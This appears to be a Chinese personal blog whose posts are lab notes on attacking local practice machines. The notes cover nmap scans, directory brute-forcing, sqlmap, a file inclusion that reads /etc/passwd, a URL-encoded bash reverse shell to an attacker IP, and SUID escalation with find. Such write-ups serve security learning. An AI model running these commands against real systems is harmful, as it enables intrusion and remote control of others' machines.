李乐意的博客

welcome to my blog~!

this is an example introduction. feel free to customize it!

add more lines to make it personal.

things i love:

  • coding
  • cats
  • coffee

mysterious meow

tags: meow
@mochi 01/02/2025

meow

meow… meow rawr, meow meow meow!

mysterious meow

tags: meow
@mochi 01/02/2025

meow

meow… meow rawr, meow meow meow!

tags:
@ 01/01/0001

端口扫描

nmap --min-rate 10000 -p- 192.168.30.157
# 开放了22,80端口
nmap --min-rate 10000 -p22,80,81 -sTVC -O -oA scan/detail 192.168.30.157
# udp端口扫描
nmap --min-rate 10000 -p- -sU -oA scan/udp 192.168.30.157
# 漏洞脚本扫描
namp --min-rate 10000 -script=vuln -p22,80 scan/vuln 192.168.30.157

image-20251127101918897

vuln脚本找到两个路径。

服务探测

image-20251127101806217

apache的默认页。

想到是目录爆破。

dirb http://192.168.30.131/

等待目录爆破,看看其他两个路径。

http://192.168.30.131/test.php
http://192.168.30.131/images

woshizhizhang,这Ip不是我kali吗,艹。

新服务探测

按着ctrl创建多个光标批量修改。

dirb http://192.168.30.157/
http://192.168.30.157/
http://192.168.30.157/test.php
http://192.168.30.157/images

image-20251127102403907

image-20251127102440566

测试上边这是个Post请求提交file参数,用于读取文件?待会测一下有没有SQL注入和文件包含漏洞。

image-20251127102541707

sqlmap

sqlmap -u http://192.168.30.157/ --data "un=user&ps=pass&login=let%27s+login" --level 4 --risk 3
sqlmap -u http://192.168.30.157/test.php --data "file=1" --level 4 --risk 3

没有成功。

文件包含(存在)

http://192.168.30.157/test

使用HackBar插件。提交post请求内容file=/etc/passwd

image-20251127111458852

tags:
@ 01/01/0001

端口扫描

22和80。

页面检查中包含base编码路径。

远程代码执行

http://192.168.30.151/workinginprogress.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.30.131%2F4444%200%3E%261%27

SUID

grep和find。

https://gtfobins.github.io/gtfobins/find/

tags:
@ 01/01/0001

端口扫描

nmap -sn --min-rate 10000 192.168.30.0/24
nmap --min-rate 10000 -p- 192.168.30.147 -Pn
nmap --min-rate 10000 -sT -sV -sC -O -p22,80,81 -oA scan/detail 192.168.30.147 # 81是未开发端口
nmap --min-rate 10000 -sU -p- -oA scan/udp 192.168.30.147
nmap --min-rate 10000 -script=vuln -p22,80 -oA scan/vuln 192.168.30.147

可以看到80端口上可以看到文件。

image-20251001144100290

服务探测

image-20251001144143896

README.md下很明显是一堆16进制内容。

image-20251001144358854

使用CyberChef转为二进制源文件。第一行可以看到这是JFIF的图片类型。数据以 0xFF, 0xD8, 0xFF, 0xE0 开头,这也是 JPEG/JFIF 图像文件头的标准标识符。image-20251001145640776

xxd -r -p README.txt output.jpg

image-20251001151049560

可能一个用户名:Bob

image-20251001144304669

是个相册,下载图片分析隐写。

wget -r -l1 -nd -A "*.jpg" -P gallery http://192.168.30.147/

命令选项解释

  • wget:下载文件的命令行工具。
  • -r递归下载(Recursive retrieval)。这是必须的,因为我们要搜索目录下的文件。
  • -l1:设置递归深度为1。这意味着 wget 只会查看指定的 URL 页面,不会进入子目录。如果你的图片在更深的子目录中,可以移除此选项或增加数字(例如 -l inf 表示无限深度)。
  • -nd不创建目录结构(No directories)。这会把所有下载的文件直接放在 -P 指定的目录下,而不是在 gallery 中再创建 192.168.30.147/ 这样的目录。
  • -A "*.jpg"接受(Accept)文件名后缀匹配 .jpg 的文件。这样可以只下载图片文件。
  • -P gallery指定前缀(Prefix),即把所有下载的文件保存到名为 gallery 的目录下。
  • http://192.168.30.147/目标URL。请确保这是一个可以通过 HTTP 访问的目录或页面,并且能列出或链接到目标 JPG 文件。

image-20251002090010679